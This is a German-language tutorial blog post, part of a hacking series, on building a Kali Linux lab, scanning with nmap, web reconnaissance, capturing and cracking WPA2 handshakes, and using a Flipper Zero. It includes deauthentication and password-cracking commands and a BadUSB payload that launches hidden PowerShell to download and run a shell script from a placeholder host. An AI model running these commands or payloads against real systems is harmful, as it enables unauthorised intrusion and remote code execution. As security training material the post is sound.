Menü
Über mich Leistungen Werdegang Zusammenarbeiten
Linux terminal with code
Sicherheit 7 Mär., 2026 • 25 Min. Lesezeit

Kali Linux-Grundlagen: Bauen Sie Ihr Hacking-Labor auf

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

Teilen:
Lee Foropoulos

Lee Foropoulos

25 Min. Lesezeit

Der Weg des Hackers: Eine 5-teilige Serie

Teil 1: EinfuehrungTeil 2: Flipper-MeisterschaftTeil 3: Kali-GrundlagenTeil 4: ExploitationTeil 5: Das vollstaendige Audit

In den Teilen 1 und 2 hast du Karten geklont, Funkfrequenzen analysiert und verstanden, warum die meiste "Sicherheit" nur Theater ist. Du hast Schwachstellen von aussen gesehen. Jetzt gehst du hinein und siehst sie aus der Perspektive des Angreifers.

Kali Linux ist die Branchenstandard-Distribution fuer Penetrationstests. Sie kommt vorinstalliert mit ueber 600 Sicherheitstools. Das kann ueberwältigend wirken. Die meisten Tutorials werfen dich ins kalte Wasser mit Befehlen, die du nicht verstehst und ohne Kontext, warum sie wichtig sind.

Wir machen das anders. Am Ende dieses Artikels wirst du ein funktionierendes Labor haben, Netzwerk-Reconnaissance auf fundamentaler Ebene verstehen und deinen eigenen WiFi-Handshake erfassen. Jeder Schritt baut auf dem vorherigen auf.

Die meisten Tutorials werfen dich ins kalte Wasser mit Befehlen, die du nicht verstehst und ohne Kontext, warum sie wichtig sind. Hier baut jeder Schritt auf dem vorherigen auf.

Teil 1: Dein Labor aufbauen

Professionelle Penetrationstester fuehren Kali nicht auf ihrer Hauptmaschine aus. Sie verwenden isolierte Umgebungen, die zurueckgesetzt, als Snapshot gespeichert und zerstoert werden koennen, ohne ihr Hauptsystem zu beeintraechtigen. Du wirst das Gleiche tun.

Option A: Virtuelle Maschine (Empfohlen zum Lernen)

Eine virtuelle Maschine gibt dir die sicherste Lernumgebung. Du kannst deinen Fortschritt als Snapshot speichern, Fehler machen und sofort zuruecksetzen.

Was du brauchst

  • Host-Maschine: 16GB+ RAM, 50GB+ freier Festplattenspeicher, moderne CPU mit Virtualisierungsunterstuetzung
  • Virtualisierungssoftware: VirtualBox (kostenlos) oder VMware Workstation Player (kostenlos fuer den persoenlichen Gebrauch)
  • Kali Linux: Offizielle vorgefertigte VM von kali.org

Projekt: Kali-VM-Einrichtung

Zeit: 30-45 Minuten

Schritte:

  1. Lade das Kali-VM-Image fuer deinen Hypervisor herunter (VirtualBox oder VMware)
  2. Entpacke das heruntergeladene Archiv (7-Zip empfohlen fuer Windows)
  3. Importiere die VM in deinen Hypervisor
  4. Konfiguriere die Ressourcen: 4GB RAM Minimum (8GB empfohlen), 2+ CPU-Kerne
  5. Aktiviere den Netzwerkadapter im "Bridged"-Modus fuer vollen Netzwerkzugang
  6. Starte die VM und melde dich mit den Standard-Zugangsdaten an: kali / kali
  7. Oeffne das Terminal und fuehre aus: sudo apt update && sudo apt full-upgrade -y
  8. Erstelle einen Snapshot namens "Fresh Install" fuer einfache Wiederherstellung

Erfolg ueberpruefen: Du kannst ein Terminal oeffnen, whoami ausfuehren und kali sehen.

Option B: Dedizierte Hardware (Fuer ernsthaftes Ueben)

Sobald du dich mit Kali wohl fuehlst, eliminiert dedizierte Hardware den VM-Overhead und ermoeglicht vollen Hardwarezugang, was fuer WLAN-Tests unerlässlich ist.

Hardware-Empfehlungen

Budget-OptionGebrauchter ThinkPad X230/T430 (100-150$), Intel WiFi ersetzt durch Atheros AR9285
Moderne OptionFramework Laptop mit Linux-kompatiblem WiFi-Modul
Dedizierter SensorRaspberry Pi 5 4GB mit externem Alfa AWUS036ACH Adapter

Fuer jetzt ist eine VM perfekt. Dedizierte Hardware wird wichtig, wenn du den Monitor-Modus fuer WLAN-Tests brauchst (spaeter in diesem Artikel behandelt).

Option C: Live-USB (Null Persistenz)

Ein Live-USB fuehrt Kali direkt ohne Installation aus. Alles verschwindet, wenn du ausschaltest. Nuetzlich zum Testen auf verschiedener Hardware, aber du verlierst deine Arbeit jede Sitzung, es sei denn, du erstellst eine persistente Partition.

bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcher

dd zerstoert Daten

Der dd-Befehl schreibt direkt auf die Festplatte ohne Bestaetigung. Ueberpruefe den Gerätenamen dreimal. Das Schreiben auf das falsche Geraet wird dieses Laufwerk komplett loeschen.

Kali Linux terminal with security tools running
Eine richtig konfigurierte Kali-Linux-Umgebung ist das Fundament jedes professionellen Penetrationstests.

Teil 2: Die Terminal-Denkweise

Bevor wir Sicherheitstools anfassen, musst du dich im Terminal wohlfuehlen. Das ist nicht optional. Die GUI existiert in Kali, aber die eigentliche Arbeit passiert auf der Kommandozeile.

Grundlegende Navigation

bash# Know where you are
pwd                    # Print working directory

# Move around
cd /home/kali          # Go to home directory
cd ..                  # Go up one level
cd -                   # Go to previous directory

# See what's here
ls                     # List files
ls -la                 # List all files with details
ls -lah                # Human-readable sizes

# Read files
cat filename           # Display entire file
less filename          # Scrollable view (q to quit)
head -n 20 filename    # First 20 lines
tail -f filename       # Follow file in real-time (logs)

Privilegien-Eskalation

Viele Sicherheitstools benoetigen Root-Zugang. In Kali gibt dir sudo temporaere Root-Rechte.

bashsudo command           # Run single command as root
sudo -i                # Start root shell (be careful)
whoami                 # Check current user
id                     # Show user and group IDs

Root mit Verantwortung

Als Root zu arbeiten bedeutet kein Sicherheitsnetz. Ein Tippfehler wie rm -rf / zerstoert alles. Modernes Kali verhindert diesen spezifischen Befehl, aber das Prinzip bleibt: Verstehe, was du ausfuehrst, bevor du es ausfuehrst.

Prozessverwaltung

bashps aux                 # All running processes
top                    # Real-time process viewer
htop                   # Better process viewer (install if needed)

# Control processes
ctrl+c                 # Stop current process
ctrl+z                 # Suspend process
bg                     # Resume in background
fg                     # Bring to foreground

# Kill processes
kill PID               # Graceful termination
kill -9 PID            # Force kill (last resort)

Netzwerkbefehle

baship a                   # Show network interfaces
ip route               # Show routing table
ping -c 4 8.8.8.8     # Test connectivity
curl ifconfig.me       # Your public IP

# DNS lookups
nslookup google.com
dig google.com

Projekt: Terminal-Orientierung

Zeit: 15 Minuten

Aufgaben:

  1. Finde deine IP-Adresse im lokalen Netzwerk mit ip a
  2. Identifiziere dein Standard-Gateway mit ip route
  3. Pinge dein Gateway, um die Konnektivitaet zu bestätigen
  4. Liste alle Dateien in /etc sortiert nach Aenderungszeit: ls -lt /etc | head
  5. Lies die ersten 50 Zeilen von /etc/passwd: head -n 50 /etc/passwd

Ziel: Du solltest navigieren, den Netzwerkstatus pruefen und Dateien lesen koennen, ohne nachzudenken.

Teil 3: Netzwerk-Reconnaissance mit Nmap

Nmap (Network Mapper) ist das wichtigste Tool, das du lernen wirst. Es entdeckt Hosts, identifiziert Dienste, erkennt Betriebssysteme und kartiert die Netzwerktopologie. Alles andere baut auf der Nmap-Ausgabe auf.

Dein erster Scan

Lass uns dein eigenes Netzwerk scannen. Zuerst identifiziere deinen Netzwerkbereich:

bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255
bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24

# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnet

Du wirst eine Ausgabe wie diese sehen:

textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)

Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

Dieser erste Scan sagt dir: "Diese Geraete existieren in meinem Netzwerk." Jetzt stellen wir tiefere Fragen.

Diensterkennung

Sobald du weisst, welche Hosts existieren, willst du wissen, welche Dienste sie ausfuehren.

bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)

Typische Ausgabe:

textPORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1
80/tcp   open  http     nginx 1.18.0
443/tcp  open  ssl/http nginx 1.18.0

Betriebssystem-Erkennung

bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1

# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1

Port-Zustaende verstehen

Nmap meldet Ports in verschiedenen Zustaenden:

  • open - Die Anwendung akzeptiert aktiv Verbindungen. Das ist es, wonach Angreifer suchen.
  • closed - Port erreichbar, aber keine Anwendung lauscht. Der Host ist aktiv, aber da ist nichts.
  • filtered - Firewall oder Filter blockiert die Sonde. Kann nicht feststellen, ob offen oder geschlossen.
  • unfiltered - Port erreichbar, aber Nmap kann nicht feststellen, ob offen oder geschlossen.

Scan-Typen und Tarnung

bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target

# SYN scan (stealthier, default with root)
sudo nmap -sS target

# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target

# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target

# Scan specific ports
sudo nmap -p 22,80,443,8080 target

# Top 1000 common ports (default behavior)
sudo nmap target

Nmap Scripting Engine (NSE)

NSE erweitert Nmap mit spezialisierten Skripten fuer Schwachstellenerkennung, Dienstenumeration und mehr.

bash# Run default safe scripts
sudo nmap -sC target

# Check for vulnerabilities
sudo nmap --script vuln target

# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target

# HTTP enumeration
sudo nmap --script http-enum target

# List available scripts
ls /usr/share/nmap/scripts/ | head -20

Projekt: Kartiere dein Netzwerk

Zeit: 30 Minuten

Voraussetzungen: Kenne deinen Netzwerkbereich von ip a

  1. Entdecke alle Hosts: sudo nmap -sn DEIN_NETZWERK/24
  2. Liste die entdeckten Hosts und ihre MAC-Adressen auf
  3. Waehle deinen Router (normalerweise .1) und fuehre aus: sudo nmap -sV -sC DEIN_ROUTER
  4. Identifiziere alle offenen Ports und Dienste auf deinem Router
  5. Fuehre sudo nmap -A DEIN_COMPUTER aus, um zu sehen, was deine eigene Maschine exponiert

Dokumentiere: Erstelle eine Textdatei, die jedes Geraet, seine IP, MAC und Dienste auflistet. Das ist deine Netzwerkkarte.

Scanne nur Netzwerke, die dir gehoeren

Netzwerke ohne Autorisierung zu scannen ist in den meisten Rechtsordnungen illegal. Selbst ein einfacher Nmap-Scan kann als unbefugter Zugang angesehen werden. Beschraenke dich auf dein eigenes Netzwerk, deine eigene Ausruestung und Netzwerke, fuer die du eine ausdrueckliche schriftliche Genehmigung hast.

Teil 4: Web-Reconnaissance

Dein Nmap-Scan hat wahrscheinlich HTTP-Dienste gefunden (Ports 80, 443, 8080). Lass uns verstehen, was dort laeuft.

Whatweb: Schnelle Dienst-Identifikation

bash# Identify web technologies
whatweb http://192.168.1.1

Beispielausgabe:

texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]

Nikto: Web-Schwachstellen-Scanner

bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1

# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentials

Verzeichnis-Enumeration: Was ist versteckt?

Webserver haben oft Verzeichnisse, die nicht von der Hauptseite verlinkt sind: Admin-Panels, Konfigurationsdateien, Backup-Dateien.

bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

Haeufige Funde:

text/admin   (Status: 301)
/backup  (Status: 403)
/config  (Status: 200)
/login   (Status: 200)

Wortlisten-Speicherort

Kali enthaelt umfangreiche Wortlisten in /usr/share/wordlists/. Die haeufigsten Verzeichnisse: dirb/, dirbuster/, rockyou.txt (Passwoerter) und seclists/ (umfassende Sammlung).

Projekt: Pruefe die Weboberflaeche deines Routers

Zeit: 20 Minuten

  1. Fuehre whatweb http://DEINE_ROUTER_IP aus, um den Server zu identifizieren
  2. Fuehre nikto -h http://DEINE_ROUTER_IP aus, um auf Schwachstellen zu pruefen
  3. Fuehre gobuster dir -u http://DEINE_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt aus
  4. Besuche alle entdeckten Verzeichnisse in einem Browser
  5. Notiere alle Admin-Panels, Versionsnummern oder interessante Funde

Haeufiger Fund: Router-Admin-Seiten mit Standard-Zugangsdaten exponiert.

Server room with network infrastructure
Netzwerk-Reconnaissance enthuellt die vollstaendige Topologie einer Zielumgebung, von Routern bis zu versteckten Diensten.

Teil 5: WLAN-Reconnaissance

Hier wird es interessant. WiFi-Netzwerke senden staendig, und mit den richtigen Tools kannst du Authentifizierungs-Handshakes erfassen: den verschluesselten Austausch, der stattfindet, wenn sich ein Geraet verbindet.

Hardware-Anforderungen

Dein eingebautes WiFi wird dafuer wahrscheinlich nicht funktionieren. Du brauchst einen Adapter, der den Monitor-Modus und Paket-Injection unterstuetzt. Empfohlen: Alfa AWUS036ACH (~50$) oder Alfa AWUS036ACM (~45$). Diese funktionieren sofort mit Kali.

Den Monitor-Modus verstehen

Der normale WiFi-Modus ("Managed Mode") empfaengt nur Pakete, die an dein Geraet adressiert sind. Der Monitor-Modus erfasst alle Pakete in Reichweite, den gesamten Datenverkehr jedes Geraets auf dem Kanal.

bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0mon

Netzwerke scannen

bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon

# You'll see:
# BSSID  = Router MAC address
# PWR    = Signal strength (higher = closer)
# CH     = Channel
# ENC    = Encryption (WPA2, WPA3, OPN)
# ESSID  = Network name

# Press Ctrl+C to stop

Was du siehst, ist jedes WiFi-Netzwerk in Reichweite, ihre Sicherheitseinstellungen und oft die damit verbundenen Geraete. Das ist es, was ein Wardriver sieht, wenn er Nachbarschaften scannt.

Einen Handshake erfassen

Wenn sich ein Geraet mit einem WPA2-Netzwerk verbindet, gibt es einen Vier-Wege-Handshake. Wenn du diesen Handshake erfasst, kannst du versuchen, das Passwort offline zu knacken.

bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"

# Now wait for a device to connect...

# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshake

Wenn du einen Handshake erfasst, zeigt airodump-ng [ WPA handshake: XX:XX:XX:XX:XX:XX ] in der oberen rechten Ecke an.

Deauth-Angriffe sind illegal

Das Senden von Deauthentifizierungspaketen an Netzwerke, die dir nicht gehoeren, ist ein Bundesverbrechen unter dem Computer Fraud and Abuse Act (in den USA) und aehnlichen Gesetzen anderswo. Teste nur in deinem eigenen Netzwerk. Das Ziel ist, die Schwachstelle zu verstehen, nicht andere anzugreifen.

Den Handshake knacken

Mit einem erfassten Handshake kannst du versuchen, das Passwort offline mit einer Wortliste zu knacken:

bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]

# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx

# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
Echte Passwoerter aus tatsaechlichen Datenlecks sind in rockyou.txt enthalten, der Standard-Wortliste zum Knacken erfasster WiFi-Handshakes.

Realitaetscheck zur Passwortstaerke

rockyou.txt enthaelt ueber 14 Millionen Passwoerter aus echten Datenlecks. Wenn dein WiFi-Passwort "password123" oder "sommer2024" oder der Name deines Hundes ist, ist es in Sekunden knackbar. Ein zufaelliges Passwort mit ueber 12 Zeichen wuerde Millionen von Jahren zum Brute-Forcen benoetigen.

Projekt: Teste deine WiFi-Sicherheit

Zeit: 45 Minuten

Voraussetzungen: Externer WiFi-Adapter mit Monitor-Modus-Unterstuetzung

  1. Aktiviere den Monitor-Modus: sudo airmon-ng start wlan0
  2. Scanne nach Netzwerken: sudo airodump-ng wlan0mon
  3. Notiere Kanal und BSSID deines eigenen Netzwerks
  4. Erfasse auf deinem Kanal: sudo airodump-ng -c CHANNEL --bssid DEIN_BSSID -w meinwifi wlan0mon
  5. Verbinde ein Geraet erneut mit deinem WiFi (oder verwende Deauth in DEINEM Netzwerk)
  6. Bestaetige die Handshake-Erfassung
  7. Teste gegen rockyou.txt: aircrack-ng -w /usr/share/wordlists/rockyou.txt meinwifi-01.cap

Ergebnis: Wenn dein Passwort gefunden wurde, aendere es sofort in etwas Zufaelliges und Langes (ueber 20 Zeichen).

Teil 6: Deinen Flipper Zero verbinden

Erinnerst du dich an all die Captures aus Teil 2? Lass uns sie in deinen Kali-Workflow integrieren.

Dateien uebertragen

bash# Connect Flipper via USB
# It appears as a mass storage device

# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper

# Your captures are in:
/mnt/flipper/subghz/       # Sub-GHz captures
/mnt/flipper/nfc/          # NFC dumps
/mnt/flipper/infrared/     # IR captures
/mnt/flipper/lfrfid/       # 125kHz RFID
/mnt/flipper/badusb/       # BadUSB scripts

NFC-Dumps analysieren

bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk

# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd

# Analyze MIFARE Classic dump
hexdump -C card.mfd | less

Sub-GHz-Analyse

bash# Flipper's .sub files are text-based
cat garage_door.sub

# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information

# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)

BadUSB-Entwicklung

Erstelle BadUSB-Payloads in Kali, teste sie auf dem Flipper:

bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF

# Host the payload from Kali:
python3 -m http.server 8000

# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/

BadUSB-Payloads sind maechtig

Diese Skripte werden automatisch ausgefuehrt, wenn sie eingesteckt werden. Ein boesartiger Payload koennte Backdoors installieren, Zugangsdaten stehlen oder Daten in Sekunden zerstoeren. Verwende sie nur auf deinen eigenen Maschinen zum Testen. Lasse deinen Flipper nie dort, wo jemand anderes ihn einstecken koennte.

Teil 7: Dokumentation und Workflow

Professionelle Penetrationstester fuehren nicht nur Tools aus. Sie dokumentieren alles. Gute Dokumentation trennt Amateure von Profis.

Notizen mit CherryTree

bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree

# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitation

Nmap-Ausgabe speichern

bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target

# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml  (parseable)
# scan_results.gnmap (greppable)

Sitzungsprotokollierung

bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log

# Now every command and output is recorded
# Type 'exit' to stop logging

Der Weg des Hackers

Eine 5-teilige Serie, die dich von neugierig zu kompetent bringt.

Teil 1: Einfuehrung Teil 2: Flipper-Meisterschaft Teil 3: Kali-Grundlagen ✓ Teil 4: Exploitation Teil 5: Vollstaendiges Audit

Checkliste Teil 3

☐ Lab-Einrichtung: Kali-VM laeuft, aktualisiert, Snapshot gespeichert

☐ Terminal: Sicher in Navigation, Berechtigungen, Prozesskontrolle

☐ Nmap: Netzwerk kartiert, Dienste identifiziert, Router gescannt

☐ Web-Recon: Router-Weboberflaeche mit whatweb/nikto analysiert

☐ WLAN: Monitor-Modus aktiviert, Netzwerke gescannt

☐ Handshake: Eigener WiFi-Handshake erfasst und getestet

☐ Flipper: Dateien uebertragen, Workflow verstanden

☐ Dokumentation: Notizen organisiert, Scans gespeichert

Kali-Grundlagen Aktionsplan 0/6

Was kommt als naechstes

Du hast dein Labor aufgebaut und die Reconnaissance-Phase gelernt. Du kannst Hosts entdecken, Dienste identifizieren und WLAN-Handshakes erfassen. Du verstehst, was Angreifer sehen, wenn sie ein Netzwerk betrachten.

In Teil 4 gehen wir von der Reconnaissance zur Exploitation ueber. Du wirst lernen:

  • Metasploit Framework, das Schweizer Taschenmesser der Exploitation
  • Gaengige Workflows zur Schwachstellenausnutzung
  • Post-Exploitation-Techniken: was nach dem initialen Zugang passiert
  • Privilegien-Eskalation: vom normalen Benutzer zum Administrator
  • Pivoting: ein kompromittiertes System nutzen, um andere anzugreifen

Reconnaissance sagt dir, wo die Tueren sind. Exploitation lehrt dich, wie du durch sie hindurchgehst.

Du hast das Territorium kartiert. Jetzt lernst du, darin zu navigieren. Teil 4 bringt dich vom Beobachter zum Operator.

Wir sehen uns in Teil 4.

How was this article?

Teilen

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Keinen Beitrag verpassen

Erhalten Sie eine Benachrichtigung bei neuen Artikeln. Keine E-Mail erforderlich.

Sie sehen ein Banner auf der Seite bei einem neuen Beitrag, plus eine Browser-Benachrichtigung wenn erlaubt.

Nur Browser-Benachrichtigungen. Kein Spam, keine E-Mail.